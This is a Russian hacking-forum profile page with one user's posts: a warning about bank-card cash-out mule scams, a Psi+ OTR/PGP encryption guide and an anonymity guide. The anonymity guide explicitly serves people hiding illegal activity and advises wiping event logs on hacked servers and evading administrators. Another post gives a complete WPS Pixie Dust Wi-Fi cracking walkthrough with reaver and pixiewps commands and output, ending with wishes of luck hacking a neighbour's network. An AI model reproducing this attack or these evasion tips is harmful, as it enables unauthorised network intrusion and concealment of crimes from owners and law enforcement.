Рады видеть вас на Ghost-Club.com

Зарегистрируйтесь сейчас, чтобы то бы вступить в наш клуб. После регистрации и входа в систему вы сможете создавать темы, отвечать на существующие темы, давать репутацию другим пользователям, получить свой собственный мессенджер, размещать обновления статуса, управлять профилем и многое другое. Это сообщение будет удалено после входа в систему.

Blmbon

Местные
  • Content Count

    15
  • Joined

  • Last visited

  • Days Won

    1
1

Community Reputation

1 Обычный
  1. В сети то и дело появляются любопытные вакансии по заработку на обналичивании средств с предоставленных работодателем банковских карт. Никаких особых требований, кроме готовности сбегать лишний раз к банкомату, не предъявляется. А что же взамен? Заработок в 30-40% от суммы с каждой отработанной карты. Кого не прельстит столь заманчивое предложение? Но за такой работой кроется для нанятого сотрудника нечто более серьезное, чем возможность потерять несколько кровно заработанных сотен рублей. Есть риск угодить за решетку. Снять денежку и… идти под суд? В мире давно процветает мошенничество с банковскими картами. С помощью специальных устройств, скиммеров, воруют данные карт у ничего не подозревающих их владельцев. Или иными незаконными способами вытягивают у обладателя банковской карты ее данные. Полученная информация позволяет мошенникам впоследствии создать аналогичные карты, на которых будет нанесена похищенная информация. Такая поддельная карта представляет собой обычный белый пластик с нанесенной магнитной лентой, на которой зашифрованы данные. Их так и называют – «белые карты». А подделка такой карты означает, что мошенники получат деньги жертвы. Но обналичивать суммы слишком опасно. Велик риск быть замеченным правоохранительными органами и схваченными на месте преступления. А кража данных с карт это серьезное преступление, после которого можно несколько лет провести за решеткой. Вот преступники и ищут дурачков, которые за них сделают «грязную» работенку за небольшое вознаграждение. Попадется? Что ж, без одной карты, зато на свободе. Да и данные о ней никуда не делись, можно их повторно нанести на очередной белый пластик. Не попадется? Еще лучше. Деньги будут. В сети разыскивается доверчивый человек, который очень хочет легких денег и не готов вникать во все нюансы. Ведь такая работа прибыльная, легкая и не требующая каких-то умений. Ему предлагается ежедневно получать несколько карт и снимать деньги с них в банкоматах. За это он получает треть снятой суммы и передает ее курьером либо перечисляет на анонимный электронный кошелек, например Perfect Money. Все пинкоды и инструкции по выводу и поведению работник тоже получит. Его задача – придерживаться их и отсылать деньги. Работа, с которой справится и школьник. Что уже говорить о взрослом! Чтобы сильно не светиться, такие преступники часто ищут жертв на закрытых форумах, группах или присылая личные сообщения понравившимся им людям. Поэтому если приходит сообщение от такого человека, не стоит думать, что это вы такой счастливчик и выбраны потому, что состоите с работодателем в закрытой группе, и он почтил вас доверием, предложив столь интересный и заманчивый заработок. Просто вы лучше остальных подходите на роль простачка, как бы грустно это не звучало бы. Нашедший такую сладкую вакансию уже мечтает, как будет ежедневно снимать в банкомате по тысяче-две долларов и иметь с этого треть суммы. Какая работа? Где еще в месяц можно будет так легко зарабатывать по 4-8 тыс. долларов, при этом тратя не более получаса в день? А вот стоило бы задуматься, почему же готовы столько платить за такую 5-ти минутную работенку? Большие деньги крутятся там, где либо высокие риски, либо узкие специфические знания. Знаний нет? Значит, попадаете в зону повышенного риска. Такой работодатель, который заинтересован в снятии денежных средств с его карт, не предоставляет никакой информации о себе, не требует предоплаты за карты и старается к минимуму свести ведение диалога со своими работниками. Ведь меньше контактов — меньше шансов на то, что на него впоследствии выйдут. Схема передачи денег иногда бывает слишком мудреная. В ней может участвовать несколько ничего не подозревающих курьеров или случайные люди, нанятые на разовую передачу конверта. Все концы должны быть заметены. Зачастую до преступника доходит лишь половина суммы, что лежит на карте. Зато он в безопасности. Чем грозит такая «работа». Обналичивание средств с поддельной карты является делом уголовно наказуемым. И еще как наказуемым! Можно легко схлопотать срок в 10 лет и вместо хорошего заработка провести несколько лет в веселой компании с сокамерниками. Мошенники пытаются уверить своих жертв, что им ничего не грозит. Максимум, у них могут изъять карты. Но на самом деле человек, пытающийся снять средства с «белой карты» уже является преступником, так как участвует в преступной схеме. Не стоит полагать, что правоохранительные органы решат вас отпустить после слов о заработке и вакансии в интернете. Да, они попытаются раскрутить всю схему и найти главных виновных, но вы в любом случае пойдете под следствием и рискуете пару лет побыть в тюрьме. И не факт, что все же следователи смогут выйти на верхушку мошеннической схемы с банковскими картами. В таком случае у «работника» есть все шансы пойти главным преступником и стать козлом отпущения. Мошенники специально подыскивают себе доверчивых жертв в других городах, чтобы не рисковать своей шкурой. Ведь такие транзакции очень легко отслеживаются. И стоит владельцу карты, с которой похищены данные, уведомить банк, как даже «белая» карта будет под прицелом у сотрудников правоохранительных органов. А сейчас у каждого банкомата установлены видеокамеры, поэтому человека, снимавшего деньги легко засекут. А выйти на его след будет не так уж и сложно. Тем более, что нанятый сотрудник по обналичиванию средств вряд ли будет бегать далеко от дома в поисках банкомата. Он пойдет в ближайший, и ходить в него будет постоянно. Не в первый, так в другой раз его поймают за снятием денег с ворованной карты. Хочется ли идти на такой риск ради 300-400 долларов? Или же лучше погулять на свободе? Деньги и риск или безденежье, но безопасность. Каждый должен решить сам. Мошенничество с предоплатой. Некоторые преступники все же опасаются загреметь за решетку по такой серьезной статье, как кража денег с чужих банковских счетов. А возможно и хотели бы заняться таким прибыльным бизнесом, но не имеют нужных навыков или устройств воровать данные с чужих карт. Вот и приходиться им довольствоваться малым – разводить пользователей в сети на удаленную работу с предоплатой. Схема по поиску клиентов практически та же, что и у тех мошенников, что делают «белые» карты. Но своих жертв они ищут уже гораздо увереннее и более масштабно. Ведь даже при поимке им не будет светить срок в 5-7 лет, да и они не собираются оставлять каких либо ниточек, таких как курьер, которые могут привести к ним. Объявления о поиске сотрудников на несложную работу по обналичиванию карточек полно в интернете. Соцсети, форумы, доски объявлений, ссылки на блогах по заработку – свои сети для приманки жертв мошенники раскидывают везде. Ведь чем больше людей они завлекут, тем больше прибыль. А доход у таких преступников может достигать сотни тысяч рублей в месяц! Жертве предлагается обналичивать деньги за определенный процент в 30-40% от суммы имеющихся средств. Легкий заработок за 15 минут работы. Делов-то! Сходить к банкомату, ввести код, снять деньги и передать курьеру либо перечислить на электронный кошелек. В отличие от преступников, в действительности занимающихся поддельными картами, эти мошенники даже не заморачиваются над схемой перевода денег от «сотрудника». Ведь даже карта до него не дойдет! Зачем тогда волноваться и продумывать схему? Можно легко встретить информацию о том, что деньги надо будет передать лично, через курьера, либо даже на верифицированный кошелек в вебмани или яндексе! Но не все так просто. Будущему сотруднику долго и упорно разъясняют все выгоды сотрудничества, схему работы, приблизительные заработки и легкость работы. И лишь в конце идет небольшая приписка, что в начале работы необходимо будет внести небольшую сумму денег отправителю карт. Залоговую стоимость, которая позволит работодателю быть уверенным, что вы не скроетесь с картой и честно отдадите ему его часть. Стоимость карт небольшая, 500-2000 рублей в зависимости от жадности «работодателя». Вы можете заказать любое количество карт, хоть сотню, но необходимо будет их оплатить. После оплаты карты вам доставит курьер лично в город, вы снимите деньги и отдадите деньги ему же. Удивительно, как на это ведутся люди, но ведутся очень хорошо! А ведь логики в предложении нет никакой! Как это 500 рублей могут покрыть потери отправителя карт, если он передает в пользование 1000 долларов? Как эти деньги могут выступать залогом и гарантией возврата денег? Ведь сотрудник может вывести эту тысячу баксов, оставить ее себе всю, а не 30%, и при этом потерять жалкие 500 рублей. Смысла нет. Да сотруднику в сотни раз выгодней работать на постоянной основе и иметь крупные суммы, чем сбегать с одной тысячей! Но вот залог почему-то позарез нужен. Да еще и за каждую карту в отдельности. А зачем нужен? А для того, чтобы денежки поступили на счет мошенника, и тот испарился. Ведь вся затея с вакансией создана для того, чтобы под видом хорошего заработка выманить деньги у доверчивой жертвы. Стоит только перечислить требуемую сумму на счет «работодателя», и он сразу же перестанет отвечать на сообщения. А где же его искать, если о нем ничего неизвестно, да и он уже давно поменял данные? И никого из потенциальных работников не задумывается, как может постоянно курсировать курьер между его городом и городом работодателя, тем более если один живет, например, в Барнауле, а второй в Москве. Во сколько же обходиться дорога или сколько времени надо курьеру, чтобы доехать из одного города в другой? Увы, и этот пункт тоже не заставляет доверчивых граждан призадуматься над тем, не дурят ли их. Любопытно, но сотруднику предлагают банковские карты словно товар в магазине. « У нас имеются карты с суммой в 1000$, заказать такую карту стоит 1000 рублей, а есть карты, пополненные на 2000$. Но за ее доставку необходимо будет заплатить уже 2 тыс. рублей». Не наводит на мысль, откуда у мошенника может на каждой карте лежать точное количество денег, да еще круглым числом и сразу на нескольких картах одинаковая сумма? Неужели кто-то специально распределял по 1 тысяче долларов на 50-70 карт? Вряд ли. Уже хотя бы это должно навести на мысль, держаться подальше от такого предложения. Жажда легких денег и халявы сильно перевешивают благоразумие, и люди не задумываются над тем, что участвуют в махинациях с деньгами и могут оказаться за тюремными стенами. Или что логики в словах работодателя совершенно нет. Но задумываться не хочется, хочется быстрей зарабатывать, причем много! Вот поэтому и ловят мошенники десятки новых жертв каждый день. Стоит иногда поразмыслить над предложениями о некоторых вакансиях! Это убережет от неприятностей.
  2. Классное устройство. Работает как часики. Сделкой доволен.
  3. вот интересно чем они руководствуются когда ставят подобные пароли?)
  4. Psi+ - это интернет-мессенджер, работающий по протоколу XMPP. Мы уже писали о связке Psi+ и PGP, а в этой теме рассмотрим также встроенный в Psi+ механизм шифрования OTR. http://roscenzura.com/attachments/265/ Для начала, пару слов, зачем это нужно. Ваша переписка в незашифрованном виде может быть получена третьими лицами разными способами: перехвачена на уровне провайдера, через открытый Wi-Fi, через корпоративную сеть и т.д. Наконец, большинство популярных мессенджеров (Skype, ICQ, Mail.Ru и др.) хранят вашу переписку на сервере и предоставляют к ней доступ по запросу органов (а это могут быть и оборотни на службе у ваших конкурентов). При использовании PGP или других механизмов шифрования, сообщение шифруется на вашем компьютере, а затем расшифровывается на компьютере вашего собеседника. Современные механизмы шифрования достаточно устойчивы к взломам, поэтому, даже если ваш трафик будет перехвачен, злоумышленники вряд ли смогут расшифровать ваши сообщения без ключа. Программа Psi+ поддерживает два режима шифрование - PGP и OTR. Считается, что PGP надежнее, но зато у OTR есть одно важное преимущество: даже если ваш приватный ключ OTR попадет в чужие руки, то предыдущая переписка не будет скомпрометирована, поскольку публичный и приватный ключи используются только для первичной аутентификации пользователей, а все дальнейшие сообщения шифруются уже с помощью одноразовых AES-ключей (так называемых Message Authentication Codes или MACs). Настройка OTR на Psi+ Итак, вы установили PSI+ на компьютер, осталось настроить шифрование. Для этого заходим в Настройки -> Плагины, выбираем из списка Off-the-Record Messaging plugin и ставим галочку Активировать. http://roscenzura.com/attachments/268/ Теперь заходим во вкладку Мои Личные Ключи и генерируем новый ключ. http://roscenzura.com/attachments/269/ Во вкладке Настройка выбираем пункт "Вручную запускать личные сообщения" и ставим галочку "Завершать сессию при уходе контакта в оффлайн" и нажимаем Применить. http://roscenzura.com/attachments/270/ OTR влючен, теперь настраиваем шифрованное общение с собеседником. В диалоговом окне нажимаем на замочек otr и выбираем пункт "Начать частную беседу". http://roscenzura.com/attachments/271/ Теперь нужно авторизовать друг друга. Для этого снова нажимаем на замочек OTR и "Аутентифицировать контакт". Аутентифицировать контакт можно тремя способами: через вопрос и ответ, через общий секретный ключ или путем сверки электронного отпечатка. http://roscenzura.com/attachments/272/ 1. Вопрос и ответ. Вы задаете вопрос, который знает только ваш собеседник, и ответ на него, а ваш собеседник должен правильно ответить на вопрос. 2. Общий секретный ключ. Здесь нужно написать одинаковую фразу обоим собеседникам, фразу безопасно можно передать через сервис https://privnote.com/. 3. Сверка электронного отпечатка. Нажимаем на замок otr и выбираем "Показать свой отпечаток". После этого подтверждаем отпечаток собеседника. Настройка PGP на Psi+ Если у вас Microsoft Windows любой версии, то вам потребуется скачать и установить систему шифрования и управления ключами GnuPG — GPG4Win. Скачайте Light версию, если вы планируете использовать PGP-шифрование только для общения. Если у вас Linux, то устанавливать ничего не нужно, поскольку GPG уже имеется в дистрибутиве. Для корректной работы связки Psi+и GPG, необходимо установить gpg4win строго в папку C:\Program Files\GNU\GnuPG, где С - системный диск. Далее следуйте инструкции. В Psi+ уже есть свой встроенный менеджер ключей, нам нужно лишь его активировать. Для этого заходим в Настройки - Плагины, выбираем из списка GnuPG Key Manager и жмем Активировать. http://roscenzura.com/attachments/277/ Тут же можно сгенерировать новый ключ, нажав кнопку Добавить или выбрать из списка существующий, созданный ранее. http://roscenzura.com/attachments/278/ Когда ключ создан, присваиваем его к нашему аккаунту. Для этого кликаем правой кнопкой мыши на имени аккаунта и выбираем Присвоить ключ OpenPGP. Программа попросит ввести пароль для ключа и будет спрашивать его при каждом перезапуске. http://roscenzura.com/attachments/279/ Теперь нам осталось обменяться ключами с собеседником и включить режим шифрования (иконка замочка в диалоговом окне). Для ленивых в PSI+ предусмотрена специальная кнопка для отправки публичного ключа, но передавать таким образом публичный ключ небезопасно. Можно передать ключ серес сервис privnote.com. http://roscenzura.com/attachments/290/
  5. Не надо удивляться,СИ в тюрьме живет бурно.И думаю вечность жить будет
  6. Еще веришь что морковкой сайты ломают?
  7. Интересная статья вызвало сомнение только вот это Можно по моему разозлить собеседника своей тупостью, т.к. он сказал нет мягко дабы тебе не выказать не уважения, а ты все равно по тем же воротам бьешь как баран
  8. Не исключено, но я посчитал ненужным указывать данный факт, чтобы не быть голословным: лично мне неизвестны случаи выдачи персональных данных о пользователях сети Tor по «первым» требованиям третьих лиц. Зато факт возможности перехвата передаваемого в сети трафика куда более реален и для кого-то может свести на «нет» использование Тора в качестве средства для проведения аудита. Однако для анонимного серфинга (если пользователь предпочитает скрывать личную информацию) данная сеть может стать отличной альтернативой цепочкам прокси-серверов.
  9. Может быть я и повторюсь в чем то, но не судите строго, первая статья Хотелось бы получить VIP Статус! но про безопасность можно говорить всегда) Как говорится:" повторение мать ученья"! Введение: зачем это нужно? Компьютеризация населения сделала заметный вклад в повседневную деятельность среднестатистического человека. Для кого-то информационные технологии стали средством получения стабильного дохода, зачастую не совсем законного, а для кого-то и совсем незаконного (простите за каламбур). Цель данного материала состоит не в описании каких-то сложных схем сокрытия факта своей деятельности от налоговой инспекции и не в предоставлении инструкции по исключению встречи с правоохранительными органами. Если читателю есть что скрывать, данный обзор подскажет как лучше организовать процесс сокрытия, в зависимости от ситуации. Схемы, представленные в обзоре, представляют собой некую базу, на основе которой можно строить свои методики. 1. Конфиденциальность при работе с операционной системой. Небольшое отступление: идея написать данный материал возникла из небольшого поста в моем блоге ("Анализ конфиденциальности при работе с гостевой ОС"), поэтому начну с рассмотрения излюбленной многими концепции «виртуальной машины». 1.1 Использование виртуальных машин. Иллюзия изолированности гостевой ОС разрушается при рассмотрении некоторых процессов, протекающих в основной ОС. В клиентских линейках многих операционных систем присутствует режим гибернации. При переходе в данный режим содержимое оперативной памяти отображается на жесткий диск и при стандартных настройках системы остается до следующего перехода. Риск сохранения состояния гостевой ОС на жестком диске довольно высок и не стоит списывать его со счетов. Для ускорения работы ОС существует механизм постраничного сохранения участков оперативной памяти, которые не используются довольно продолжительное время (swap). Далее, при обращении к такому участку он восстанавливается в оперативную память. Соль этого механизма в том, что все эти манипуляции производятся прозрачно для пользователя и последний никак не может повлиять на процесс копирования. Изменение размера файла подкачки снижает, но не устраняет риск попадания данных о состоянии сеанса гостевой ОС на жесткий диск из оперативной памяти. В свою очередь, полное отключение свопа устраняет потенциальный источник «утечки», но снижает скорость работы системы в целом. Тут придется идти на компромисс. + удобность в повседневном использовании + быстрое удаление компрометирующих данных в случае надобности + наличие образов и, как следствие, возможность сокрытия образа компрометирующей гостевой ОС + быстрая развертываемость инфраструктуры - наличие неявных каналов утечки данных из гостевой ОС в основную ОС - снижение производительности (весомый недостаток для многих) - отсутствие автономности образов гостевых ОС от используемого для виртуализации ПО 1.2 Конфиденциальность при работе с LiveCD(DVD/USB)-дистрибутивами. Широко распространена практика использования мобильных носителей с предустановленными системами. Кто-то предпочитает одну единственную систему, предназначенную для установки на flash или CD и содержащую весь необходимый инструментарий для работы в «полевых» условиях, а кто-то отдает предпочтение своей собственной сборке, настраивая все под свои нужды. При работе с данным типом операционных систем наиболее высоким показателем качества, пожалуй, является «быстроразвертываемость» (мобильность). Лучший инструмента для анонимной работы в незнакомых условиях трудно найти, чего не скажешь о повседневном использовании: отсутствие возможности сохранения данных, конфигурационных файлов и т.п. является как отрицательным фактом (в ущерб usability), так и положительным (отсутствие утечки данных в основную память рабочей станции). Манипуляция данными исключительно в оперативной памяти позволяет не беспокоиться о явных каналах утечки данных. + мобильность + возможность работы в «полевых» условиях + работа с данными исключительно в оперативной памяти - неудобство повседневного использования. 1.3 Конфиденциальность при работе с удаленными рабочими станциями (выделенными серверами). Неаккуратное использование удаленных рабочих станций для совершения незаконных действий может раскрыть нарушителя, продемонстрировав его IP-адрес или другую полезную информацию третьим лицам. Рассмотрим возможные каналы утечки данных на примере Windows-серверов, в силу их наибольшей распространенности, которая, в свою очередь, вытекает из большей степени уязвимости. При использовании службы терминалов (она же RDP) и при недостаточных «предосторожностях» есть риск попадания авторизованных действий в системные журналы (в Win NT так называемый event log: C:\WINDOWS\system32\config, все файлы которого скрытые и подлежат удалению с помощью специального ПО, наподобие Unlocker). Если установленные взломщиком программы создают сетевую активность или активно используют ресурсы сервера, бдительный администратор может заметить подозрительную сетевую активность (либо подозрительную новую службу). Есть риск попасть «под колпак», т. е. администратор имеет все возможности снифать порт, на котором висит ПО нарушителя. Отсюда, как результат, утечка конфиденциальной информации. К тому же никто не даст гарантии, что взломанный сервер не входит в сеть honeypot со всеми вытекающими… + выделенные сервера доступны 24/7 + производительность - при недостаточных мероприятиях существует возможность попасть под наблюдение администраторов сервера, со всеми вытекающими последствиями. 2. Анонимность при работе с web-ресурсами. «Независимые исследователи» защищенности web-приложений в своей работе зачастую используют цепочки прокси-серверов и/или анонимную сеть Tor (или ее аналоги, например, I2P). Рассмотрим подробнее каждую из этих схем. 2.1 Использование прокси-серверов. Техническая особенность цепочки прокси-серверов: отображение в логах целевого сайта последнего сервера в цепочке и прозрачный обмен данными между взломщиком и целевым сайтом. Однако как первый, так и второй факт можно оспорить: существует множество методов раскрытия нарушителя, который прячется за прокси-сервером, а также резкое снижение скорости соединения в силу технических особенностей. Думаю, заострять внимание на подобной схеме не имеет смысла, так как на форуме данная тема «истерта» до мелочей. Перейдем к более интересной схеме - анонимной сети Tor. 2.2 Использование анонимной сети Tor. (дан как пример) Распределенная система серверов (нодов), между которыми трафик проходит в зашифрованном виде, знакома любому, кто хоть немного задумывался над собственной анонимностью в Сети. На последней ноде в цепочке (так называемой, exit-ноде) передаваемые данные проходят процедуру расшифровки и передаются целевому серверу в открытом виде. Данный факт позволяет поставить снифер на выходной ноде и просматривать весь проходящий трафик. Звучит просто, но на самом деле все именно так. Подробнее процедура перехвата трафика в сети Tor описана в октябрьском номере журнала «Хакер» (статья «Включаем Tor на всю катушку»). + прохождение трафика в зашифрованном виде по цепочке серверов +постоянная смена цепочки (изменение маршрута следования пакетов) +возможность создания ноды - передача данных с exit-node целевому серверу в открытом виде и, как следствие, возможность перехвата пакетов. 3. … Технологию VPN я нарочно оставил за кадром, ведь обилие ее реализаций и способы использования сильно разнятся, что не позволит охватить все схемы в данном обзоре. Каждый предпочитает свою схему обеспечения конфиденциальности при работе в различных сферах ИТ и поэтому давать универсальные рекомендации я не берусь, а хочу лишь попросить читателей не стесняться и выкладывать описания своих схем для последующего детального анализа и выявления «узких» мест, которые я (и другие участники форума) с удовольствием прокомментируют в данном посте.
  10. Сегодня я хочу рассказать как взломать WiFi WPA/WPA2 (WPS ATTACK) нам нужно будет: Linux (у меня стоит Kali Linux, наиболее удобна так как большинство утилит вшиты) Сетевая карта (PCI или USB не имеет значения, у меня PCI) Утилиты, которые потребуются уже вшиты в ОС. Но тем, у кого обычный линукс надо скачать вот эти утилиты - aircrack, wifite, reaver, pixiewps. Если все готово, то начинаем. Открываем терминал и пишем: airmon-ng - определяем наш беспроводной интерфейс. У каждого своя ситуация, в моем случае wlan0 Далее пишем следующее: airmon-ng start wlan0 - переводим в режим мониторинга. ВНИМАНИЕ название вашего интерфейса может изменится, в моем случае стало wlan0mon. После этого обычно остаются процессы, которые могут помешать их надо удалить используя kill **** (вместо **** id процесса) Теперь необходимо просканировать наше вайфай пространство: airodump-ng wlan0mon Используя утилиту wifite определим одну важную вещь(кстати, используя эту утилиту можно хакнуть вайфай без других утилит, но мне она не подходит): wifite запускается сканирование, выбираем сеть с включенным WPS. Но для того, чтобы все прошло успешно надо что бы в выбранной нами сети был клиент, без подключенного клиента это пустая трата времени. Если что, дожидаемся его появления. Wifite больше не пригодится. Взламывать WPS будем, используя reaver: reaver Далее: reaver -i wlan0mon -b F8:C0:91:14:C7:6B после -b должен быть bssid выбранной вами сети(смотрим в airodump-ng) Reaver начинает взлом, придется подождать пока не появятся E-Hash1 и E-Hash2 Итак, reaver закончил работу, но WPS PIN не появился, а появились данные о роутере все в норме. Тут то нам и нужен pixiewps: pixiewps Далее смотрим пример: pixiewps -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -r 59:1f:11:57:8b:52:61:40:63:fe:8d:e3:3d:04:36:a5:74:43:01:c6:a7:4a:06:60:2f:3c:c5:d3:87:7c:c0:d4:7a:d3:6b:09:f7:c5:5c:b5:18:62:13:b6:0c:79:3c:8f:58:97:e7:0c:b7:47:3d:6c:60:21:6c:d3:bc:a7:62:05:80:6b:a7:9c:b2:26:b5:62:37:7b:7c:08:24:93:15:87:bb:ff:ed:3f:6a:33:54:4c:a1:a0:1b:2e:2e:d2:35:e8:5d:72:55:77:57:97:ef:9a:c0:2f:c1:20:cf:de:a9:7b:e2:eb:70:a5:86:4d:03:72:ec:5c:82:d9:a4:70:44:3a:30:3a:63:6a:8d:39:c8:5e:71:1f:66:ab:4d:89:6d:e7:98:36:91:1e:e4:fc:2a:e6:c9:3b:9b:88:80:be:6a:04:d0:7b:43:2b:26:4e:62:4c:ea:01:7d:1e:90:a2:ba:33:29:b3:94:0b:20:02:9f:55:05:d3:68:d2:26:41:9c:2e -s 99:98:3e:42:0c:88:55:58:e2:97:cc:86:db:2a:ba:89:d9:6b:55:d9:7b:9a:1b:c3:93:a9:c8:70:35:4c:0a:7b -z f4:d3:c8:f0:64:24:e5:da:a9:97:16:4b:58:3d:41:15:76:15:5b:01:9e:1e:77:81:ab:55:6d:7e:82:8d:71:d8 -a 95:c5:07:7a:ef:d1:f9:d7:6d:6d:44:6d:57:c5:d9:59:c6:60:4d:bf:de:34:cc:8f:94:d8:b8:e1:74:0f:0b:18 -n 02:cc:48:b6:5c:b4:1f:2d:54:b2:27:67:3d:29:70:8f Что получилось в итоге: Pixiewps 1.1 [*] E-S1: 30:c9:c0:15:11:aa:81:5b:3b:cc:d4:79:26:4c:dc:f9 [*] E-S2: 30:c9:c0:15:11:aa:81:5b:3b:cc:d4:79:26:4c:dc:f9 [+] WPS pin: 99956042 [*] Time taken: 1 s Итак, мы получили WPS PIN используя который можем подключится к взломаной сетке. Чтобы подключиься вводим WPS PIN вместо пароля. Ну вроде все!)Удачи взломать соседкий Wi Fi,но не забывайте это уголовно наказуемо!
  11. Да не будут хранить логи у всех,ведь нужно такие огромнные сервера,там тонны тарабайтов,максимум,если конкретно надо убдет проследить за определным человеком,тогда они поставят ловилку